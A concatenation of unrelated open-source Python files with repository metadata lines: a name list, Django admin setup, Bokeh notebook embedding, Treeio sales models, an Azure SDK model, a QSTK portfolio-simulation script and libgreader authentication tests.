'Vonette',
'Vonna',
'Vui',
'Wade',
'Wafa',
'Waggoner',
'Walda',
'Waldo',
'Walker',
'Wallace',
'Walt',
'Walta',
'Walter',
'Wanda',
'Waneta',
'Ward',
'Warner',
'Warren',
'Wasaki',
'Washi',
'Washington',
'Watson',
'Waverly',
'Wayne',
'Webster',
'Weldon',
'Wence',
'Wenceslaus',
'Wenda',
'Wendell',
'Wendi',
'Wendy',
'Werner',
'Wes',
'Wesley',
'Weston',
'Wheeler',
'Whitby',
'Whitfield',
'Whitley',
'Whitney',
'Wilbur',
'Wiley',
'Wilford',
'Wilfred',
'Wilfredo',
'Wilhelmina',
'Will',
'Willa',
'Willard',
'Willem',
'William',
'Williams',
'Willis',
'Willow',
'Wilma',
'Wilson',
'Wilton',
'Win',
'Winda',
'Winfred',
'Winifred',
'Winona',
'Winson',
'Winslow',
'Winston',
'Winta',
'Winter',
'Winthrop',
'Wolfgang',
'Wood',
'Woodrow',
'Woods',
'Woody',
'Worden',
'Wrangler',
'Wyanet',
'Wyatt',
'Wyman',
'Wynn',
'Wynne',
'Wynona',
'Wyome',
'Xander',
'Xandy',
'Xanthe',
'Xanthus',
'Xanto',
'Xavier',
'Xaviera',
'Xena',
'Xenia',
'Xenos',
'Xentrie',
'Xerxes',
'Xi-wang',
'Xinavane',
'Xolani',
'Xuxa',
'Xylon',
'Yachi',
'Yadid',
'Yael',
'Yaholo',
'Yahto',
'Yair',
'Yaksh or yakchh',
'Yale',
'Yamal',
'Yamin',
'Yana',
'Yancy',
'Yank',
'Yanka',
'Yanni',
'Yannis',
'Yardan',
'Yardley',
'Yaro',
'Yaron',
'Yaser',
'Yasin',
'Yasmin',
'Yasnery',
'Yasuo',
'Yates',
'Ye',
'Yeardleigh',
'Yehudi',
'Yelena',
'Yen',
'Yenge',
'Yepa',
'Yered',
'Yeriel',
'Yesenia',
'Yestin',
'Yetty',
'Yeva',
'Yihana',
'Yitro',
'Yitta',
'Ymir',
'Yo',
'Yogi',
'Yoko',
'Yoland',
'Yolanda',
'Yomonda',
'Yonah',
'Yoninah',
'Yorick',
'York',
'Yosef',
'Yosefu',
    'Yōshi',
'Yoshi',
'Yoshino',
'Ysabel',
'Ysanne',
'Yuk',
'Yuki',
'Yul',
'Yule',
'Yuma',
'Yuri',
'Yuval',
'Yves',
'Yvette',
'Yvon',
'Yvonne',
'Zaccheus',
'Zach',
'Zachariah',
'Zachary',
'Zaci',
'Zada',
'Zafira',
'Zahava',
'Zahur',
'Zaida',
'Zaide',
'Zaido',
'Zaila',
'Zainab',
'Zaira',
'Zaire',
'Zaki',
    "Zak'nefein",
'Zalman',
'Zan',
'Zane',
'Zanna',
'Zara',
'Zareb',
'Zared',
'Zareh',
'Zarek',
'Zarifa',
'Zarina',
'Zarren',
'Zavad',
'Zaybian',
'Zaylyn',
'Zayn',
'Zayne',
'Zayo',
'Zaza',
'Zazu',
'Zbigniew',
    "Ze'ev",
'Zea',
'Zeb',
'Zebidy',
'Zebulon',
'Zechariah',
'Zechuriah',
'Zed',
'Zef',
'Zeheb',
'Zeke',
'Zeki',
'Zelda',
'Zelia',
'Zelig',
'Zena',
'Zenas',
'Zene',
'Zenia',
'Zenobia',
'Zenon',
'Zephan',
'Zephiniah',
'Zeppelin',
'Zesiro',
'Zev',
'Zia',
'Ziazan',
'Ziggy',
'Zikomo',
'Zili',
'Zilli',
'Zimri',
'Zinna',
'Zinnia',
'Zion',
'Ziraili',
'Zita',
'Ziv',
'Ziva',
'Zivan',
'Ziven',
'Ziya',
'Zizi',
'Zo',
'Zoan',
'Zoe',
'Zoey',
'Zofia',
'Zohar',
'Zoie',
'Zola',
'Zolen',
'Zoltan',
'Zoltin',
'Zona',
'Zontee',
'Zorada',
'Zoraida',
'Zsa zsa',
'Zsuzsanna',
'Zula',
'Zuleika',
'Zulema',
'Zuriel',
'Zyta', ]
| jamespacileo/django-pure-pagination | example_project/core/names.py | Python | bsd-3-clause | 54,755 |
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.contrib import admin
from .models import *
admin.site.register(MessageInWaiting)
admin.site.register(ResponseInWaiting)
admin.site.register(Template)
| dimagi/rapidsms-contrib-apps-dev | training/admin.py | Python | bsd-3-clause | 215 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from ..core.templates import DOC_NB_JS
from ..core.json_encoder import serialize_json
from ..model import Model
from ..util.string import encode_utf8
from .elements import div_for_render_item
from .util import FromCurdoc, OutputDocumentFor, standalone_docs_json_and_render_items
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
    'notebook_content',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def notebook_content(model, notebook_comms_target=None, theme=FromCurdoc):
''' Return script and div that will display a Bokeh plot in a Jupyter
Notebook.
The data for the plot is stored directly in the returned HTML.
Args:
model (Model) : Bokeh object to render
notebook_comms_target (str, optional) :
A target name for a Jupyter Comms object that can update
the document that is rendered to this notebook div
theme (Theme, optional) :
Defaults to the ``Theme`` instance in the current document.
Setting this to ``None`` uses the default theme or the theme
already specified in the document. Any other value must be an
instance of the ``Theme`` class.
Returns:
script, div, Document
.. note::
Assumes :func:`~bokeh.io.notebook.load_notebook` or the equivalent
has already been executed.
'''
if not isinstance(model, Model):
raise ValueError("notebook_content expects a single Model instance")
# Comms handling relies on the fact that the new_doc returned here
# has models with the same IDs as they were started with
with OutputDocumentFor([model], apply_theme=theme, always_new=True) as new_doc:
(docs_json, [render_item]) = standalone_docs_json_and_render_items([model])
div = div_for_render_item(render_item)
render_item = render_item.to_json()
if notebook_comms_target:
render_item["notebook_comms_target"] = notebook_comms_target
script = DOC_NB_JS.render(
docs_json=serialize_json(docs_json),
render_items=serialize_json([render_item]),
)
return encode_utf8(script), encode_utf8(div), new_doc
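# A minimal usage sketch (hypothetical notebook cell; assumes the notebook
# resources have already been loaded, e.g. via output_notebook()):
#
#     from bokeh.plotting import figure
#     from IPython.display import HTML, Javascript, display
#
#     p = figure()
#     p.line([1, 2, 3], [4, 6, 5])
#     script, div, doc = notebook_content(p)
#     display(HTML(div))      # the placeholder div for the plot
#     display(Javascript(script))  # the JS that renders into the div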
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| stonebig/bokeh | bokeh/embed/notebook.py | Python | bsd-3-clause | 3,803 |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Sales module objects.
"""
from django.core.urlresolvers import reverse
from django.db import models
from treeio.core.models import Object, User, ModuleSetting
from treeio.identities.models import Contact
from treeio.finance.models import Transaction, Currency, Tax
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from decimal import Decimal, ROUND_UP
from time import time as ttime
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length=512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
PRODUCT_TYPES = (
('service', 'Service'),
('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'),
)
ACTION_CHOICES = (
('inactive', 'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'),
)
name = models.CharField(max_length=512)
product_type = models.CharField(max_length=32, default='good',
choices=PRODUCT_TYPES)
parent = models.ForeignKey('self', blank=True, null=True,
related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True,
on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True,
choices=ACTION_CHOICES)
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
        except Exception:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length=512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
CONTACT_METHODS = (
('email', 'E-Mail'),
('phone', 'Phone'),
('post', 'Post'),
('face', 'Face to Face')
)
contact = models.ForeignKey(Contact)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(
Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=CONTACT_METHODS)
assigned = models.ManyToManyField(User, related_name='sales_lead_assigned',
blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(
Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(
User, related_name='sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(
max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(
Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(
User, related_name='sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't
# have to be unique)
next_ref = SaleOrder.objects.all().aggregate(
models.Max('id'))['id__max'] + 1
        except Exception:
next_ref = 1
        full_ref = '%.5d/%s' % (next_ref, str(ttime() * 10)[8:-2])
return full_ref
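    # Illustrative only: the references produced look like
    # '00042/38210476' -- a zero-padded sequence number plus a
    # time-derived suffix (the exact digits depend on the clock).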
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
# TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(
trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount'] += (item_total * (p.tax.rate / 100)).quantize(Decimal('.01'), rounding=ROUND_UP)
else:
taxes[p.tax.id] = {'name': p.tax.name, 'rate': p.tax.rate,
'amount': (item_total * (p.tax.rate / 100))
.quantize(Decimal('.01'), rounding=ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
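    # Worked example (figures illustrative): one ordered product with
    # rate 50.00, quantity 2 and a 15% tax gives a subtotal of 100.00 and
    # a single tax entry of 15.00, so get_taxes_total() returns 15.00 and
    # get_total() returns 115.00.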
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
CYCLE_PERIODS = (
('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly', 'Quarterly'),
('yearly', 'Yearly')
)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
    cycle_period = models.CharField(max_length=32, choices=CYCLE_PERIODS,
                                    default='monthly')
cycle_end = models.DateField(blank=True, null=True)
active = models.BooleanField(default=False)
details = models.CharField(max_length=512, blank=True, null=True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
        elif self.cycle_period == 'quarterly':
            # a calendar quarter is three months
            p = relativedelta(months=+3)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
        elif self.cycle_period == 'quarterly':
            # a calendar quarter is three months
            p = relativedelta(months=+3)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
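    # e.g. calling renew() on 2011-06-15 with cycle_period='monthly' sets
    # cycle_end to 2011-07-15 (dates illustrative).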
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'default_order_status')[0]
            new_invoice.status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + \
str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(
trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
# if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
# Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(
pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
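    # Possible return values, in evaluation order: 'Inactive', 'Expired',
    # None (via deactivate() once past the grace window), 'Paid',
    # 'Invoiced' and 'Active'.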
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(
Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
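    # e.g. rate 10.00, quantity 3, discount 10 (percent):
    # 30.00 - 3.00 = 27.00 (figures illustrative).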
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
class Meta:
ordering = ['product']
| havard024/prego | sales/models.py | Python | mit | 17,973 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class OperationDisplay(Model):
"""Display metadata associated with the operation.
:param provider: Service provider: Microsoft Network.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: Type of the operation: get, read, delete, etc.
:type operation: str
:param description: Description of the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(self, provider=None, resource=None, operation=None, description=None):
super(OperationDisplay, self).__init__()
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
| AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/operation_display.py | Python | mit | 1,498 |
import datetime as dt
import numpy as np
import pandas as pd
# QSTK Imports
import QSTK.qstkutil.DataAccess as da
import QSTK.qstkutil.qsdateutil as du
def get_orders_list(s_file_path):
l_columns = ["year", "month", "day", "sym", "type", "num"]
df_orders_list = pd.read_csv(s_file_path, sep=',', header=None)
df_orders_list = df_orders_list.dropna(axis=1, how='all')
df_orders_list.columns = l_columns
return df_orders_list
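# Illustrative orders file (assumed layout): comma separated, no header,
# one order per row in year,month,day,symbol,type,shares order, e.g.
#
#     2011,1,10,AAPL,Buy,1500
#     2011,1,13,AAPL,Sell,1500
#
# A trailing empty column, if present, is dropped by dropna(axis=1).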
def get_orders(df_orders_list):
na_orders_list = df_orders_list.values
l_orders = []
ld_daily_orders = None
for order in na_orders_list:
dt_date = dt.datetime(order[0], order[1], order[2], hour=16)
d_order = {df_orders_list.columns[3]: order[3], \
df_orders_list.columns[4]: order[4], \
df_orders_list.columns[5]: int(order[5])}
if l_orders != [] and dt_date == l_orders[-1][0]:
l_orders[-1][1].append(d_order)
else:
ld_daily_orders = []
ld_daily_orders.append(d_order)
l_orders.append([dt_date, ld_daily_orders])
na_orders = np.array(l_orders)
df_orders = pd.DataFrame(na_orders[:, 1], index=na_orders[:, 0], columns=["ord"])
df_orders = df_orders.sort()
dt_start = df_orders.ix[0].name
dt_end = df_orders.ix[-1].name
ls_symbols = list(set(df_orders_list["sym"]))
    ls_symbols.sort()  # set() is unordered, so sort for a deterministic symbol list
return df_orders, dt_start, dt_end, ls_symbols
def get_data(dt_start, dt_end, ls_symbols):
ldt_timestamps = du.getNYSEdays(dt_start, dt_end, dt.timedelta(hours=16))
ls_keys = ["open", "high", "low", "close", "volume", "actual_close"]
dataobj = da.DataAccess('Yahoo')
ldf_data = dataobj.get_data(ldt_timestamps, ls_symbols, ls_keys)
d_data = dict(zip(ls_keys, ldf_data))
for s_key in ls_keys:
d_data[s_key] = d_data[s_key].fillna(method="ffill")
d_data[s_key] = d_data[s_key].fillna(method="bfill")
d_data[s_key] = d_data[s_key].fillna(1.0)
return d_data
def get_prices(dt_start, dt_end, ls_symbols, s_key="close"):
# close = adjusted close
# actual_close = actual close
d_data = get_data(dt_start, dt_end, ls_symbols)
return d_data[s_key]
def process_daily_orders(dt_date, df_orders, df_prices, df_num, df_val, df_res):
    op = 0  # +1 for a buy, -1 for a sell
daily_orders = list(df_orders.ix[dt_date, "ord"])
for order in daily_orders:
if order["type"] == "Buy":
op = 1
elif order["type"] == "Sell":
op = -1
df_num.ix[dt_date, order["sym"]] += op * order["num"]
df_res.ix[dt_date, "cash"] += -op * order["num"] * df_prices.ix[dt_date, order["sym"]]
def update_port(dt_date, dt_last_orders_date, ls_symbols, df_num, df_res):
for s_symbol in ls_symbols:
df_num.ix[dt_date, s_symbol] = df_num.ix[dt_last_orders_date, s_symbol]
df_res.ix[dt_date, "cash"] = df_res.ix[dt_last_orders_date, "cash"]
def value_port(dt_date, ls_symbols, df_prices, df_num, df_val, df_res):
for s_symbol in ls_symbols:
df_val.ix[dt_date, s_symbol] = df_num.ix[dt_date, s_symbol] * df_prices.ix[dt_date, s_symbol]
df_res.ix[dt_date, "port"] = np.sum(df_val.ix[dt_date, :])
df_res.ix[dt_date, "total"] = df_res.ix[dt_date, "port"] + df_res.ix[dt_date, "cash"]
def process_orders(df_orders, df_prices, cash):
ldt_dates = list(df_prices.index)
ls_symbols = list(df_prices.columns)
df_num = pd.DataFrame(index=ldt_dates, columns=ls_symbols)
df_val = pd.DataFrame(index=ldt_dates, columns=ls_symbols)
df_res = pd.DataFrame(index=ldt_dates, columns=["port", "cash", "total"])
df_num = df_num.fillna(0.0)
df_val = df_val.fillna(0.0)
df_res = df_res.fillna(0.0)
df_res.ix[0, "cash"] = cash
ldt_orders_dates = list(df_orders.index)
iter_orders_dates = iter(ldt_orders_dates)
dt_orders_date = iter_orders_dates.next()
dt_last_orders_date = dt_orders_date
for dt_date in ldt_dates:
update_port(dt_date, dt_last_orders_date, ls_symbols, df_num, df_res)
if dt_date == dt_orders_date:
process_daily_orders(dt_date, df_orders, df_prices, df_num, df_val, df_res)
try:
dt_last_orders_date = dt_orders_date
dt_orders_date = iter_orders_dates.next()
except StopIteration:
pass
value_port(dt_date, ls_symbols, df_prices, df_num, df_val, df_res)
df_port = df_num.join(df_val, lsuffix="_num", rsuffix="_val").join(df_res)
#df_port.to_csv("port.csv")
return df_port
def save_values(df_port, s_out_file_path):
ldt_dates = df_port.index
na_dates = np.array([[dt_date.year, dt_date.month, dt_date.day] for dt_date in ldt_dates])
na_total = np.array(df_port["total"])
na_values = np.insert(arr=na_dates, obj=3, values=na_total, axis=1)
df_values = pd.DataFrame(na_values, columns=["year", "month", "day", "total"])
df_values.to_csv(s_out_file_path, sep=",", header=False, index=False)
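# Output sketch: save_values() writes one "year,month,day,total" row per
# trading day, e.g. 2011,1,10,1000000.0 (the values here are made up).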
if __name__ == '__main__':
print "start market_sim.py"
s_in_file_path = "data\\q1_orders.csv"
s_out_file_path = "data\\q1_values.csv"
s_cash = "100000"
f_cash = float(s_cash)
df_orders_list = get_orders_list(s_in_file_path)
df_orders, dt_start, dt_end, ls_symbols = get_orders(df_orders_list)
df_prices = get_prices(dt_start, dt_end, ls_symbols)
df_port = process_orders(df_orders, df_prices, f_cash)
save_values(df_port, s_out_file_path)
print "end market_sim.py" | gdikos/qstk-on-ec2 | market_sim.py | Python | mit | 5,585 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
libG(oogle)Reader
Copyright (C) 2010 Matt Behrens <[email protected]> http://asktherelic.com
Python library for working with the unofficial Google Reader API.
Unit tests for oauth and ClientAuthMethod in libgreader.
"""
try:
import unittest2 as unittest
except ImportError:
import unittest
from libgreader import GoogleReader, OAuthMethod, OAuth2Method, ClientAuthMethod, Feed
import requests
import re
import urlparse
try:
    import mechanize
except ImportError:
    # mechanize is only needed by the deprecated OAuth1 helpers below
    mechanize = None
from .config import *
class TestClientAuthMethod(unittest.TestCase):
def test_ClientAuthMethod_login(self):
ca = ClientAuthMethod(username,password)
self.assertNotEqual(ca, None)
def test_reader(self):
ca = ClientAuthMethod(username,password)
reader = GoogleReader(ca)
self.assertNotEqual(reader, None)
def test_bad_user_details(self):
self.assertRaises(IOError, ClientAuthMethod, 'asdsa', '')
def test_reader_user_info(self):
ca = ClientAuthMethod(username,password)
reader = GoogleReader(ca)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
#automated approval of oauth url
#returns mechanize Response of the last "You have accepted" page
def automated_oauth_approval(url):
#general process is:
# 1. assume user isn't logged in, so get redirected to google accounts
# login page. login using test account credentials
# 2. redirected back to oauth approval page. br.submit() should choose the
# first submit on that page, which is the "Accept" button
br = mechanize.Browser()
br.open(url)
br.select_form(nr=0)
br["Email"] = username
br["Passwd"] = password
response1 = br.submit()
br.select_form(nr=0)
req2 = br.click(type="submit", nr=0)
response2 = br.open(req2)
return response2
@unittest.skip('deprecated')
class TestOAuth(unittest.TestCase):
def test_oauth_login(self):
auth = OAuthMethod(oauth_key, oauth_secret)
self.assertNotEqual(auth, None)
def test_getting_request_token(self):
auth = OAuthMethod(oauth_key, oauth_secret)
token, token_secret = auth.setAndGetRequestToken()
url = auth.buildAuthUrl()
response = automated_oauth_approval(url)
self.assertNotEqual(-1,response.get_data().find('You have successfully granted'))
def test_full_auth_process_without_callback(self):
auth = OAuthMethod(oauth_key, oauth_secret)
auth.setRequestToken()
auth_url = auth.buildAuthUrl()
response = automated_oauth_approval(auth_url)
auth.setAccessToken()
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
def test_full_auth_process_with_callback(self):
auth = OAuthMethod(oauth_key, oauth_secret)
#must be a working callback url for testing
auth.setCallback("http://www.asktherelic.com")
token, token_secret = auth.setAndGetRequestToken()
auth_url = auth.buildAuthUrl()
#callback section
#get response, which is a redirect to the callback url
response = automated_oauth_approval(auth_url)
query_string = urlparse.urlparse(response.geturl()).query
#grab the verifier token from the callback url query string
token_verifier = urlparse.parse_qs(query_string)['oauth_verifier'][0]
auth.setAccessTokenFromCallback(token, token_secret, token_verifier)
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
#automate getting the approval token
def mechanize_oauth2_approval(url):
"""
general process is:
1. assume user isn't logged in, so get redirected to google accounts
login page. login using account credentials
But, if the user has already granted access, the user is auto redirected without
having to confirm again.
